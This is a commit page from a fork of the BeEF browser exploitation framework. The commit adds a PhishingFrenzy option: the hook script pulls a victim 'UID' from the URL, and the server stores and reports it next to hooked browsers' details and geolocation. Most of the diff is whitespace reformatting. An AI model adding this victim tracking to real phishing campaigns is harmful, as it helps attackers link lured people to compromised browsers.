Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added PhishingFrenzy integration config option and code

Browse Source
This commit is contained in:
antisnatchor
2014-10-13 11:51:25 +02:00
parent 01758a12ef
commit 50a9784606
5 changed files with 120 additions and 78 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
config.yaml
View File

@@ -130,6 +130,13 @@ beef:
enable: false enable: false
database: '/opt/GeoIP/GeoLiteCity.dat' database: '/opt/GeoIP/GeoLiteCity.dat'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here # You may override default extension configuration parameters here
extension: extension:
requester: requester:

85
core/main/client/browser.js
View File

@@ -726,12 +726,12 @@ beef.browser = {
}, },
/** /**
* Returns true if Chrome for iOS 31. * Returns true if Chrome for iOS 31.
* @example: beef.browser.isC31iOS() * @example: beef.browser.isC31iOS()
*/ */
isC31iOS: function () { isC31iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 31) ? true : false); return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 31) ? true : false);
}, },
/** /**
* Returns true if Chrome 32. * Returns true if Chrome 32.
@@ -742,9 +742,9 @@ beef.browser = {
}, },
/** /**
* Returns true if Chrome for iOS 32. * Returns true if Chrome for iOS 32.
* @example: beef.browser.isC32iOS() * @example: beef.browser.isC32iOS()
*/ */
isC32iOS: function () { isC32iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 32) ? true : false); return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 32) ? true : false);
}, },
@@ -758,9 +758,9 @@ beef.browser = {
}, },
/** /**
* Returns true if Chrome for iOS 33. * Returns true if Chrome for iOS 33.
* @example: beef.browser.isC33iOS() * @example: beef.browser.isC33iOS()
*/ */
isC33iOS: function () { isC33iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 33) ? true : false); return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 33) ? true : false);
}, },
@@ -774,9 +774,9 @@ beef.browser = {
}, },
/** /**
* Returns true if Chrome for iOS 34. * Returns true if Chrome for iOS 34.
* @example: beef.browser.isC34iOS() * @example: beef.browser.isC34iOS()
*/ */
isC34iOS: function () { isC34iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 34) ? true : false); return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 34) ? true : false);
}, },
@@ -790,9 +790,9 @@ beef.browser = {
}, },
/** /**
* Returns true if Chrome for iOS 35. * Returns true if Chrome for iOS 35.
* @example: beef.browser.isC35iOS() * @example: beef.browser.isC35iOS()
*/ */
isC35iOS: function () { isC35iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 35) ? true : false); return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 35) ? true : false);
}, },
@@ -806,9 +806,9 @@ beef.browser = {
}, },
/** /**
* Returns true if Chrome for iOS 36. * Returns true if Chrome for iOS 36.
* @example: beef.browser.isC36iOS() * @example: beef.browser.isC36iOS()
*/ */
isC36iOS: function () { isC36iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 36) ? true : false); return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 36) ? true : false);
}, },
@@ -822,9 +822,9 @@ beef.browser = {
}, },
/** /**
* Returns true if Chrome for iOS 37. * Returns true if Chrome for iOS 37.
* @example: beef.browser.isC37iOS() * @example: beef.browser.isC37iOS()
*/ */
isC37iOS: function () { isC37iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 37) ? true : false); return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 37) ? true : false);
}, },
@@ -890,13 +890,13 @@ beef.browser = {
* Returns a hash of string keys representing a given capability * Returns a hash of string keys representing a given capability
* @example: beef.browser.capabilities()["navigator.plugins"] * @example: beef.browser.capabilities()["navigator.plugins"]
*/ */
capabilities: function() { capabilities: function () {
var out = {}; var out = {};
var type = this.type(); var type = this.type();
out["navigator.plugins"] = (type.IE11 || !type.IE); out["navigator.plugins"] = (type.IE11 || !type.IE);
return out; return out;
}, },
/** /**
@@ -2145,6 +2145,24 @@ beef.browser = {
if (has_wmp) details['HasWMP'] = has_wmp; if (has_wmp) details['HasWMP'] = has_wmp;
if (has_foxit) details['HasFoxit'] = has_foxit; if (has_foxit) details['HasFoxit'] = has_foxit;
var pf_integration = "<%= @phishing_frenzy_enable %>";
if (pf_integration) {
var pf_param = "UID";
var pf_victim_uid = "";
var location_search = window.location.search.substring(1);
var params = location_search.split('&');
for (var i = 0; i < params.length; i++) {
var param_entry = params[i].split('=');
if (param_entry[0] == pf_param) {
pf_victim_uid = param_entry[1];
details['PhishingFrenzyUID'] = pf_victim_uid;
break;
}
}
} else {
details['PhishingFrenzyUID'] = "N/A";
}
return details; return details;
}, },
@@ -2346,11 +2364,12 @@ beef.browser = {
/** /**
* Get the browser language * Get the browser language
*/ */
getBrowserLanguage: function(){ getBrowserLanguage: function () {
var l = 'Unknown'; var l = 'Unknown';
try{ try {
l = window.navigator.userLanguage || window.navigator.language; l = window.navigator.userLanguage || window.navigator.language;
}catch(e){} } catch (e) {
}
return l; return l;
}, },

80
core/main/handlers/browserdetails.rb
View File

@@ -68,10 +68,10 @@ module BeEF
#Parse http_headers. Unfortunately Rack doesn't provide a util-method to get them :( #Parse http_headers. Unfortunately Rack doesn't provide a util-method to get them :(
@http_headers = Hash.new @http_headers = Hash.new
http_header = @data['request'].env.select {|k,v| k.to_s.start_with? 'HTTP_'} http_header = @data['request'].env.select { |k, v| k.to_s.start_with? 'HTTP_' }
.each {|key,value| .each { |key, value|
@http_headers[key.sub(/^HTTP_/, '')] = value @http_headers[key.sub(/^HTTP_/, '')] = value
} }
zombie.httpheaders = @http_headers.to_json zombie.httpheaders = @http_headers.to_json
zombie.save zombie.save
#print_debug "[INIT] HTTP Headers: #{zombie.httpheaders}" #print_debug "[INIT] HTTP Headers: #{zombie.httpheaders}"
@@ -112,37 +112,37 @@ module BeEF
else else
#print_debug "[INIT] Geolocation results: #{geoip}" #print_debug "[INIT] Geolocation results: #{geoip}"
BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} is connecting from: #{geoip}", "#{zombie.id}") BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} is connecting from: #{geoip}", "#{zombie.id}")
BD.set(session_id, 'LocationCity', "#{geoip['city_name']}") BD.set(session_id, 'LocationCity', "#{geoip['city_name']}")
BD.set(session_id, 'LocationCountry', "#{geoip['country_name']}") BD.set(session_id, 'LocationCountry', "#{geoip['country_name']}")
BD.set(session_id, 'LocationCountryCode2', "#{geoip['country_code2']}") BD.set(session_id, 'LocationCountryCode2', "#{geoip['country_code2']}")
BD.set(session_id, 'LocationCountryCode3', "#{geoip['country_code3']}") BD.set(session_id, 'LocationCountryCode3', "#{geoip['country_code3']}")
BD.set(session_id, 'LocationContinentCode', "#{geoip['continent_code']}") BD.set(session_id, 'LocationContinentCode', "#{geoip['continent_code']}")
BD.set(session_id, 'LocationPostCode', "#{geoip['postal_code']}") BD.set(session_id, 'LocationPostCode', "#{geoip['postal_code']}")
BD.set(session_id, 'LocationLatitude', "#{geoip['latitude']}") BD.set(session_id, 'LocationLatitude', "#{geoip['latitude']}")
BD.set(session_id, 'LocationLongitude', "#{geoip['longitude']}") BD.set(session_id, 'LocationLongitude', "#{geoip['longitude']}")
BD.set(session_id, 'LocationDMACode', "#{geoip['dma_code']}") BD.set(session_id, 'LocationDMACode', "#{geoip['dma_code']}")
BD.set(session_id, 'LocationAreaCode', "#{geoip['area_code']}") BD.set(session_id, 'LocationAreaCode', "#{geoip['area_code']}")
BD.set(session_id, 'LocationTimezone', "#{geoip['timezone']}") BD.set(session_id, 'LocationTimezone', "#{geoip['timezone']}")
BD.set(session_id, 'LocationRegionName', "#{geoip['real_region_name']}") BD.set(session_id, 'LocationRegionName', "#{geoip['real_region_name']}")
end end
else else
print_error "[INIT] Geolocation failed - Could not find MaxMind GeoIP database '#{geoip_file}'" print_error "[INIT] Geolocation failed - Could not find MaxMind GeoIP database '#{geoip_file}'"
print_more "Download: http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz" print_more "Download: http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz"
end end
end end
# detect browser proxy # detect browser proxy
using_proxy = false using_proxy = false
[ [
'CLIENT_IP', 'CLIENT_IP',
'FORWARDED_FOR', 'FORWARDED_FOR',
'FORWARDED', 'FORWARDED',
'FORWARDED_FOR_IP', 'FORWARDED_FOR_IP',
'PROXY_CONNECTION', 'PROXY_CONNECTION',
'PROXY_AUTHENTICATE', 'PROXY_AUTHENTICATE',
'X_FORWARDED', 'X_FORWARDED',
'X_FORWARDED_FOR', 'X_FORWARDED_FOR',
'VIA' 'VIA'
].each do |header| ].each do |header|
unless JSON.parse(zombie.httpheaders)[header].nil? unless JSON.parse(zombie.httpheaders)[header].nil?
using_proxy = true using_proxy = true
@@ -153,12 +153,12 @@ module BeEF
# retrieve proxy client IP # retrieve proxy client IP
proxy_clients = [] proxy_clients = []
[ [
'CLIENT_IP', 'CLIENT_IP',
'FORWARDED_FOR', 'FORWARDED_FOR',
'FORWARDED', 'FORWARDED',
'FORWARDED_FOR_IP', 'FORWARDED_FOR_IP',
'X_FORWARDED', 'X_FORWARDED',
'X_FORWARDED_FOR' 'X_FORWARDED_FOR'
].each do |header| ].each do |header|
proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil? proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
end end
@@ -311,10 +311,10 @@ module BeEF
# get and store the yes|no value for browser components # get and store the yes|no value for browser components
components = [ components = [
'VBScriptEnabled', 'HasFlash', 'HasPhonegap', 'HasGoogleGears', 'VBScriptEnabled', 'HasFlash', 'HasPhonegap', 'HasGoogleGears',
'HasFoxit', 'HasWebSocket', 'HasWebRTC', 'HasActiveX', 'HasFoxit', 'HasWebSocket', 'HasWebRTC', 'HasActiveX',
'HasSilverlight', 'HasQuickTime', 'HasRealPlayer', 'HasWMP', 'HasSilverlight', 'HasQuickTime', 'HasRealPlayer', 'HasWMP',
'hasSessionCookies', 'hasPersistentCookies' 'hasSessionCookies', 'hasPersistentCookies'
] ]
components.each do |k| components.each do |k|
v = get_param(@data['results'], k) v = get_param(@data['results'], k)
@@ -366,6 +366,16 @@ module BeEF
print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]" print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
end end
end end
if config.get('beef.integration.phishing_frenzy.enable')
# get and store the browser plugins
victim_uid = get_param(@data['results'], 'PhishingFrenzyUID')
if BeEF::Filters.alphanums_only?(victim_uid)
BD.set(session_id, 'PhishingFrenzyUID', victim_uid)
else
self.err_msg "Invalid PhishingFrenzy Victim UID returned from the hook browser's initial connection."
end
end
end end
def get_param(query, key) def get_param(query, key)

7
core/main/handlers/modules/beefjs.rb
View File

@@ -38,7 +38,7 @@ module BeEF
# @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate # @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
# @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate # @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
ext_js_sub_files.each{ |ext_js_sub_file| ext_js_sub_files.each { |ext_js_sub_file|
if config.get("beef.extension.evasion.enable") if config.get("beef.extension.evasion.enable")
if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file) if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list" print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
@@ -103,6 +103,11 @@ module BeEF
hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port") hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
end end
# @note Set if PhishingFrenzy integration is enabled
if config.get("beef.integration.phishing_frenzy.enable")
hook_session_config['phishing_frenzy_enable'] = config.get("beef.integration.phishing_frenzy.enable")
end
# @note populate place holders in the beef_js string and set the response body # @note populate place holders in the beef_js string and set the response body
eruby = Erubis::FastEruby.new(beef_js) eruby = Erubis::FastEruby.new(beef_js)
@hook = eruby.evaluate(hook_session_config) @hook = eruby.evaluate(hook_session_config)

19
core/main/rest/handlers/hookedbrowsers.rb
View File

@@ -98,15 +98,15 @@ module BeEF
details = BeEF::Core::Models::BrowserDetails details = BeEF::Core::Models::BrowserDetails
{ {
'id' => hb.id, 'id' => hb.id,
'session' => hb.session, 'session' => hb.session,
'name' => details.get(hb.session, 'BrowserName'), 'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'), 'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'), 'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'BrowserPlatform'), 'platform' => details.get(hb.session, 'BrowserPlatform'),
'ip' => hb.ip, 'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'), 'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s, 'port' => hb.port.to_s,
'page_uri' => details.get(hb.session, 'PageURI') 'page_uri' => details.get(hb.session, 'PageURI')
} }
end end
@@ -129,7 +129,8 @@ module BeEF
details.get(hb.session, 'LocationCity'), details.get(hb.session, 'LocationCity'),
details.get(hb.session, 'LocationCountry'), details.get(hb.session, 'LocationCountry'),
details.get(hb.session, 'LocationLatitude'), details.get(hb.session, 'LocationLatitude'),
details.get(hb.session, 'LocationLongitude') details.get(hb.session, 'LocationLongitude'),
details.get(hb.session, 'PhishingFrenzyUID')
] ]
end end
hbs_online hbs_online